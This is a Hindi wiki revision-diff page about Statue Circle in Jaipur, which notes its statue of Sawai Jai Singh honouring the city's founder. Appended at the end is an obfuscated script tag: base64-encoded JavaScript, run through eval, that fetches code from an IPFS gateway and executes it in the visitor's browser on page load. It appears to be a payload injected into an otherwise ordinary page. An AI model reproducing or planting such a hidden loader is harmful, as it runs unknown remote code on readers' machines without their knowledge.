Difference between revisions of "स्टैच्यू सर्किल जयपुर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "{{राजस्थान}}" to "{{राजस्थान के पर्यटन स्थल}}")
 
(5 intermediate revisions by 3 users not shown)
Line 1: Line 1:
 +
[[चित्र:Statue-Circle-Jaipur.jpg|thumb|स्टैच्यू सर्किल, [[जयपुर]]]]
 +
'''स्टैच्यू सर्किल''' [[राजस्थान]] राज्य के [[जयपुर]] में स्थित है।
 
*जयपुर में स्थित चक्कर के मध्य सवाई [[जयसिंह]] का स्टैच्यू बहुत ही उत्कृष्ट ढंग से बना हुआ है।  
 
*जयपुर में स्थित चक्कर के मध्य सवाई [[जयसिंह]] का स्टैच्यू बहुत ही उत्कृष्ट ढंग से बना हुआ है।  
 
*इसे जयपुर के संस्थापक को श्रद्धांजलि देने के लिए नई क्षेत्रीय योजना के अंतर्गत बनाया गया है।
 
*इसे जयपुर के संस्थापक को श्रद्धांजलि देने के लिए नई क्षेत्रीय योजना के अंतर्गत बनाया गया है।
 +
 +
{{लेख प्रगति
 +
|आधार=
 +
|प्रारम्भिक=प्रारम्भिक1
 +
|माध्यमिक=
 +
|पूर्णता=
 +
|शोध=
 +
}}
 +
==संबंधित लेख==
 +
{{राजस्थान के पर्यटन स्थल}}
  
{| width="100%"
 
|-
 
|
 
==अन्य लिंक==
 
|-
 
|
 
{{राजस्थान के पर्यटन स्थल}}
 
|}
 
 
[[Category:राजस्थान]]
 
[[Category:राजस्थान]]
 
[[Category:जयपुर के पर्यटन स्थल]]
 
[[Category:जयपुर के पर्यटन स्थल]]
 
[[Category:राजस्थान_के_पर्यटन_स्थल]]
 
[[Category:राजस्थान_के_पर्यटन_स्थल]]
 
[[Category:पर्यटन कोश]]
 
[[Category:पर्यटन कोश]]
 +
[[Category:जयपुर]]
 
__INDEX__
 
__INDEX__

Latest revision as of 06:31, 6 August 2012

[[chitr:Statue-Circle-Jaipur.jpg|thumb|staichyoo sarkil, jayapur]] staichyoo sarkil rajasthan rajy ke jayapur mean sthit hai.

  • jayapur mean sthit chakkar ke madhy savaee jayasianh ka staichyoo bahut hi utkrisht dhang se bana hua hai.
  • ise jayapur ke sansthapak ko shraddhaanjali dene ke lie nee kshetriy yojana ke aantargat banaya gaya hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>